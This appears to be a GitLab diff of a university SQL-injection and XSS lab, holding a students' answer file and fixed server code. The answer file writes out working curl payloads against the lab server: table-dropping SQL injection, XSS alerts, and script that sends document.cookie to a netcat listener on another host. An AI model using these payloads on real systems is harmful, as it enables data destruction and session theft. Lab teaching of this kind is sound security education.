Skip to content
Snippets Groups Projects

Compare revisions

Changes are shown as if the source revision was being merged into the target revision. Learn more about comparing revisions.

Source

Select target project
No results found
Select Git revision
  • master
1 result

Target

Select target project
No results found
Select Git revision
  • master
1 result
Show changes

Commits on Source 6

13 files
+ 352
17
Compare changes
  • Side-by-side
  • Inline

Files

Makefile

0 → 100644
+9 −0
Original line number Original line Diff line number Diff line 
db:

	docker-compose -f ./deployments/docker-compose.yml up -d db adminer

	

up: db

	sleep 10

	docker-compose -f ./deployments/docker-compose.yml up -d web_vul web_sql_correct web_xss

	

down:

	docker-compose -f ./deployments/docker-compose.yml down

README.md

+1 −0
Original line number Original line Diff line number Diff line
@@ -191,3 +191,4 @@ données en base, au moment de l'affichage, les deux? Pourquoi ? 




Essayez à nouveau l'exploitation de la faille développée plus tôt, pour

Essayez à nouveau l'exploitation de la faille développée plus tôt, pour

vérifier que l'application n'est plus vulnérable.

vérifier que l'application n'est plus vulnérable.

config.py

+4 −4
Original line number Original line Diff line number Diff line 
#!/usr/bin/env python3

#!/usr/bin/env python3





DB_HOST="localhost"

DB_HOST="10.1.0.2"

DB_USER="isi"

DB_USER="pouet"

DB_NAME="isi"

DB_NAME="isitp"

DB_PASS="toto"
 
DB_PASS="pouet"

deployments/Dockerfile.server

0 → 100644
+14 −0
Original line number Original line Diff line number Diff line 
# set base image (host OS)

FROM python



# set the working directory in the container

WORKDIR /app



# copy the content of the local src directory to the working directory

COPY . .



# install dependencies

RUN pip install -r requirements.txt



# command to run on container start

CMD [ "python3", "serveur.py" ]

deployments/Dockerfile.server_correct

0 → 100644
+14 −0
Original line number Original line Diff line number Diff line 
# set base image (host OS)

FROM python



# set the working directory in the container

WORKDIR /app



# copy the content of the local src directory to the working directory

COPY . .



# install dependencies

RUN pip install -r requirements.txt



# command to run on container start

CMD [ "python3", "server_correct.py" ]

deployments/Dockerfile.server_xss

0 → 100644
+14 −0
Original line number Original line Diff line number Diff line 
# set base image (host OS)

FROM python



# set the working directory in the container

WORKDIR /app



# copy the content of the local src directory to the working directory

COPY . .



# install dependencies

RUN pip install -r requirements.txt



# command to run on container start

CMD [ "python3", "server_xss.py" ]

deployments/docker-compose.yml

0 → 100644
+82 −0
Original line number Original line Diff line number Diff line 
version: '3.3'



networks:

  isi:

    ipam:

      driver: default

      config:

        - subnet: 10.1.0.0/24



services:

   db:

     image: mysql

     volumes:

       - ./init.sql:/docker-entrypoint-initdb.d/init.sql

     restart: always

     environment:

       MYSQL_ROOT_USER: root

       MYSQL_ROOT_PASSWORD: root

       MYSQL_DATABASE: isitp

       MYSQL_USER: pouet

       MYSQL_PASSWORD: pouet

     ports:

          - "3306:3306"

     networks:

      isi:

          ipv4_address: "10.1.0.2"



   web_vul:

     image: isi2_web:0.1.0

     restart: always

     build:

      context: ..

      dockerfile: /home/ubuntu/isi-tp2-injection/deployments/Dockerfile.server

     restart: always

     ports:

          - "8080:8080"

     depends_on:

      - db     

     networks:

      isi:

          ipv4_address: "10.1.0.3"

          

   web_sql_correct:

     image: isi2_web_correct:0.1.0

     restart: always

     build:

      context: ..

      dockerfile: /home/ubuntu/isi-tp2-injection/deployments/Dockerfile.server_correct

     restart: always

     ports:

          - "8081:8081"

     depends_on:

      - db     

     networks:

      isi:

          ipv4_address: "10.1.0.5"

          

   web_xss:

     image: isi2_web_xss:0.1.0

     restart: always

     build:

      context: ..

      dockerfile: /home/ubuntu/isi-tp2-injection/deployments/Dockerfile.server_xss

     restart: always

     ports:

          - "8082:8082"

     depends_on:

      - db     

     networks:

      isi:

          ipv4_address: "10.1.0.6"

          

   adminer:

     image: adminer

     restart: always

     ports:

          - "8000:8080"

     networks:

      isi:

          ipv4_address: "10.1.0.4"

deployments/init.sql

0 → 100644
+16 −0
Original line number Original line Diff line number Diff line 
CREATE DATABASE IF NOT EXISTS isitp;

USE isitp;

CREATE TABLE chaines (

	id int NOT NULL AUTO_INCREMENT, 

	txt varchar(255) not null, 

	who varchar(255) not null,

	PRIMARY KEY(id)

);



CREATE TABLE chaines2 (

	id int NOT NULL AUTO_INCREMENT, 

	txt varchar(255) not null, 

	who varchar(255) not null,

	PRIMARY KEY(id)

);

INSERT INTO chaines2 (txt,who) VALUES ('findme', '0.0.0.0.0');

rendu.md

+54 −11
Original line number Original line Diff line number Diff line
@@ -2,41 +2,84 @@ 




## Binome

## Binome





Nom, Prénom, email: ___

- ABDULLAH Mohamad <mohamad.abdullah.etu@univ-lille.fr>

Nom, Prénom, email: ___

- LAKHDAR Selim <selim.lakhdar.etu@univ-lille.fr>









## Question 1

## Question 1





* Quel est ce mécanisme? 

* Le mécanisme utilisé est un controle grâce à une regex. On ne peut entrer que des chiffres ou des lettres.





* Est-il efficace? Pourquoi? 

* Non, car le côntrole est effectué côté client. Il suffit de désactiver les scripts JS.





## Question 2

## Question 2





* Votre commande curl

* Commande curl qui bypass la vérification





```

- curl -X POST -d "chaine=Mohamed" http://172.28.101.47:8080/



- curl -X POST -d "chaine=Mohamed@Selim" http://172.28.101.47:8080/

```





## Question 3

## Question 3





* Votre commande curl pour effacer la table

* Votre commande curl pour effacer la table (V1)



```

- curl -X POST -d "chaine=%22%29%3B+DROP+TABLE+chaines%3B--" http://172.28.101.47:8080/

- curl -X POST -d "chaine=%22%29%3B+TRUNCATE+TABLE+chaines%3B--" http://172.28.101.47:8080/

- curl -X POST -d 'chaine=");+TRUNCATE+TABLE+chaines%3B--' http://172.28.101.47:8080/

- curl -X POST -d 'chaine=");+DROP+TABLE+chaines%3B--' http://172.28.101.47:8080/

```





* commande pour bypass le champ who 

```

- curl -X POST -d "chaine=hacked','000000')#" http://172.28.101.47:8080/ 

```

* Expliquez comment obtenir des informations sur une autre table

* Expliquez comment obtenir des informations sur une autre table





- Il suffit d'échapper la commande SQL et de rajouter un SELECT * FROM othertable.

- De plus on sait que MySQL crée une table information_schema qui garde toutes les infos sur une Table.



```

- curl -X POST -d "chaine=hacked','000000')+AND+SELECT+*+FROM+chaines2#" http://172.28.101.47:8080/

```



## Question 4

## Question 4





Rendre un fichier server_correct.py avec la correction de la faille de

Rendre un fichier server_correct.py avec la correction de la faille de sécurité. Expliquez comment vous avez corrigé la faille.  

sécurité. Expliquez comment vous avez corrigé la faille.



- Il faut utiliser des rêquetes préparées. 





```

requete = """INSERT INTO chaines (txt,who) VALUES (%s,%s)"""

cursor.execute(requete, [post["chaine"], cherrypy.request.remote.ip])

```

## Question 5

## Question 5





* Commande curl pour afficher une fenetre de dialog.

* Commande curl pour afficher une fenetre de dialog.





```

- curl -X POST -d "chaine=<script>alert('bonjour')</script>" http://172.28.101.47:8080/

```



* Commande curl pour lire les cookies

* Commande curl pour lire les cookies





```

- curl -X POST -d "chaine=<script>alert(document.cookie)</script>" http://172.28.101.47:8080/

```



* Commande curl pour voler les cookies



```

- nc -l -p 6666 (sur la machine 172.28.101.111)

- curl -X POST --data-urlencode "chaine=<script>location.replace(\"http://172.28.101.111:6666?c=\"+document.cookie)</script>" http://172.28.101.47:8080

```



## Question 6

## Question 6





Rendre un fichier server_xss.py avec la correction de la

Rendre un fichier server_xss.py avec la correction de la faille. Expliquez la demarche que vous avez suivi.

faille. Expliquez la demarche que vous avez suivi.





- Il faut échapper les caractères spéciaux grâce à html.escape()

server_correct.py

0 → 100755
+70 −0
Original line number Original line Diff line number Diff line 
#!/usr/bin/env python3



import mysql.connector

import cherrypy

import config



class VulnerableApp(object):

    def __init__(self):

        self.conn = mysql.connector.connect(host=config.DB_HOST, user=config.DB_USER, database=config.DB_NAME, password=config.DB_PASS)



    @cherrypy.expose

    def index(self, **post):

        cursor = self.conn.cursor(prepared=True)

        if cherrypy.request.method == "POST":

            requete = """INSERT INTO chaines (txt,who) VALUES (%s,%s)"""

            print("req: [" + requete + "]")

            cursor.execute(requete, [post["chaine"], cherrypy.request.remote.ip])

            self.conn.commit()



        chaines = []

        cursor.execute("SELECT txt,who FROM chaines");

        for row in cursor.fetchall():

            chaines.append(row[0] + " envoye par: " + row[1])



        cursor.close()

        return '''

<html>

<head>

<title>Application Python Vulnerable</title>

</head>

<body>

<p>

Bonjour, je suis une application vulnerable qui sert a inserer des chaines dans une base de données MySQL!

</p>



<p>

Liste des chaines actuellement insérées:

<ul>

'''+"\n".join(["<li>" + s + "</li>" for s in chaines])+'''

</ul>

</p>



<p> Inserer une chaine:



<form method="post" onsubmit="return validate()">

<input type="text" name="chaine" id="chaine" value="" />

<br />

<input type="submit" name="submit" value="OK" />

</form>



<script>

function validate() {

    var regex = /^[a-zA-Z0-9]+$/;

    var chaine = document.getElementById('chaine').value;

    console.log(regex.test(chaine));

    if (!regex.test(chaine)) {

        alert("Veuillez entrer une chaine avec uniquement des lettres et des chiffres");

        return false;

    }

    return true;

}

</script>



</p>

</body>

</html>

'''





cherrypy.quickstart(VulnerableApp(), '/', {'global': {'server.socket_host':'0.0.0.0','server.socket_port': 8081}})

server_xss.py

0 → 100755
+71 −0
Original line number Original line Diff line number Diff line 
#!/usr/bin/env python3



import mysql.connector

import cherrypy

import config

import html



class VulnerableApp(object):

    def __init__(self):

        self.conn = mysql.connector.connect(host=config.DB_HOST, user=config.DB_USER, database=config.DB_NAME, password=config.DB_PASS)



    @cherrypy.expose

    def index(self, **post):

        cursor = self.conn.cursor(prepared=True)

        if cherrypy.request.method == "POST":

            requete = """INSERT INTO chaines (txt,who) VALUES (%s,%s)"""

            print("req: [" + requete + "]")

            cursor.execute(requete, [post["chaine"], cherrypy.request.remote.ip])

            self.conn.commit()



        chaines = []

        cursor.execute("SELECT txt,who FROM chaines");

        for row in cursor.fetchall():

            chaines.append(row[0] + " envoye par: " + row[1])



        cursor.close()

        return '''

<html>

<head>

<title>Application Python Vulnerable</title>

</head>

<body>

<p>

Bonjour, je suis une application vulnerable qui sert a inserer des chaines dans une base de données MySQL!

</p>



<p>

Liste des chaines actuellement insérées:

<ul>

'''+"\n".join(["<li>" + html.escape(s) + "</li>" for s in chaines])+'''

</ul>

</p>



<p> Inserer une chaine:



<form method="post" onsubmit="return validate()">

<input type="text" name="chaine" id="chaine" value="" />

<br />

<input type="submit" name="submit" value="OK" />

</form>



<script>

function validate() {

    var regex = /^[a-zA-Z0-9]+$/;

    var chaine = document.getElementById('chaine').value;

    console.log(regex.test(chaine));

    if (!regex.test(chaine)) {

        alert("Veuillez entrer une chaine avec uniquement des lettres et des chiffres");

        return false;

    }

    return true;

}

</script>



</p>

</body>

</html>

'''





cherrypy.quickstart(VulnerableApp(), '/', {'global': {'server.socket_host':'0.0.0.0','server.socket_port': 8082}})

serveur.py

+1 −2
Original line number Original line Diff line number Diff line
@@ -67,5 +67,4 @@ function validate() { 
'''

'''









cherrypy.quickstart(VulnerableApp())

cherrypy.quickstart(VulnerableApp(), '/', {'global': {'server.socket_host':'0.0.0.0','server.socket_port': 8080}})